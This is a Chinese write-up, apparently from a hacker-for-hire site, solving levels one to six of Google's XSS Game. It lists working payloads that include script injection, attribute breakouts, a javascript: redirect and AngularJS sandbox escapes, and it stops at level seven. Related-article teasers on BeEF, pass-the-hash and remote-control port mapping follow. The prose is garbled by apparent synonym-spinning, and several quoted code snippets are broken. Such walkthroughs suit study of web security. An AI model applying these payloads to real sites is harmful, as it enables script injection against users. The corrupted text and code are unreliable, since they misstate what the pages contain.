Google最新XSS Game Writeup
本文介绍了怎么完结谷歌最新的XSSGame的进程,完结了这八个应战就有时机取得Nexus 5x。实际上这八个应战整体来说都不难,都是些常见的xss。通关要求是只要能弹出alert窗口即可。
之一关
反射型xss,在搜索框提交的内容终究会出现在成果页面的html代码里,没有任何过滤,直接搜索:
script>alert('freebuf')script>
第二关
仍是反射型,提交内容后会有必定推迟。经过检查html源码能够知道推迟的时刻(timer=)被直接插入到了img标签里的onload事情里:
id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('');" />
直接恳求url:/?timer=’-alert(1)-’,通关。
第三关
展现了一些猫的图片,当图片换了后,url仅仅变化了#后边的内容(#1 > #2),感觉能够经过这个id来反射xss。
检查源代码:
function chooseTab() {
var html = "Cat " + parseInt() + "
";
html += " + + ".jpg' />";
document.getElementById('tabContent').innerHTML = html;
// Select the current tab
var tabs = document.querySelectorAll('.tab');
for (var i = 0; i if (tabs[i].id == "tab" + parseInt()) {
tabs[i].className = "tab active";
} else {
tabs[i].className = "tab";
}
}
window.location.hash = ;
// Tell parent we've changed the tab
top.postMessage({'url': self.location.toString()}, "*");
}
哼,依据上一关的创意,感觉能够持续运用一下on事情,修正id后,图片肯定是不存在的,所以运用onerror:
#1'onerror=alert(1)>
搞定
第四关
翻开后是一个注册页面,让咱们填写邮箱地址,注册完结后经过url里边的next参数把咱们跳转回主页,检查源码:
script>
setTimeout(function() { window.location = user provided>; }, 1000);
script>
在html中,链接能够是js代码,比方:
a href="javascript:...">a>
直接恳求这个跳转url:
confirm?next=javascript:alert(1)
第五关
一个F歌(foogle)搜索框,运用了angular *** 1.5.8,感觉是爆过缝隙的,上某网搜索(angularjs 1.5.8 injection)找到运用办法:
?utm_term=&utm_campaign={{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
第六关
angular *** 1.2版别的搜索框,在搜索框中提交的内容终究进到了class为ng-non-bindable的div标签里:
#一般的div标签
Normal: {{1 + 2}}
#输出:Normal: 3
#ng-non-bindable
Ignored: {{1 + 2}}
#输出:Ignored: {{1 + 2}}
随后发现假如直接提交花括弧会被删掉,所以运用“{”,终究结构这样一个url:
?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
第七关
经过GET(参数menu)和 *** ONP恳求加载了一个博客页面,而呼应的title,pictures会被处理为h1标签和img标签。关卡提示:common CSP bypass。
猜想xss
[1] [2] 黑客接单网
相关文章
浅谈跨域威胁与安全-黑客接单平台
WEB前端中最常见的两种安全危险,XSS与CSRF,XSS,即跨站脚本进犯、CSRF即跨站恳求假造,两者归于跨域安全进犯,关于常见的XSS以及CSRF在此不多议论,仅议论一些不太常见的跨域技能以及安全...
Vegan-可以防护BeEF进犯的Chrome扩展插件
阅读器运用结构(BeEF)是一个易于运用的开源东西,许多安全职业的从业人员和黑客都可以运用它来对网页阅读器进行进犯。现在,已知的可以抵挡BeEF进犯的办法十分的少,所以我决议开发一个Chrome阅读...
黑客接单网:端口映射该怎么做,看完这些内容,原来端口映射如此简单
端口映射是什么? 端口映射就是将外网的IP地址上的端口映射到内网中一台机器,当访问这个外网ip的端口,就会将用户的央求映射到指定机器中,不理解看下面就懂了。 远控端口映射原理 不少人学员初学远控的时...
查开宾馆记录:黑客接单网内幕曝光
“我真的可以查一下,但它不完整,”“我确实找到了,我看到几个人叫我的名字”。 在这篇帖子下,许多用户声称通过实际测量找到了关于自己或朋友的信息,并声称数据库不完整。 记者昨天登录该网站,利用自己和...
运用 PtH 进犯 NTLM 认证的 Web 使用
本文具体介绍了在Windows/Active Directory环境中运用PtH进犯NTLM认证的web运用的具体进程。该技能细节来源于Alva ‘Skip’ Duckwall 和Chris Camp...
操控流程完整性:给我们介绍一种“特殊”的Javascript反剖析技能
写在前面的话 了解歹意软件的实在代码对歹意软件剖析人员来说对错常有优势的,由于这样才干够实在了解歹意软件所要做的工作。但不幸的是,咱们并不总是能够得到“实在”的代码,有时歹意软件剖析人员或许需求相似...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!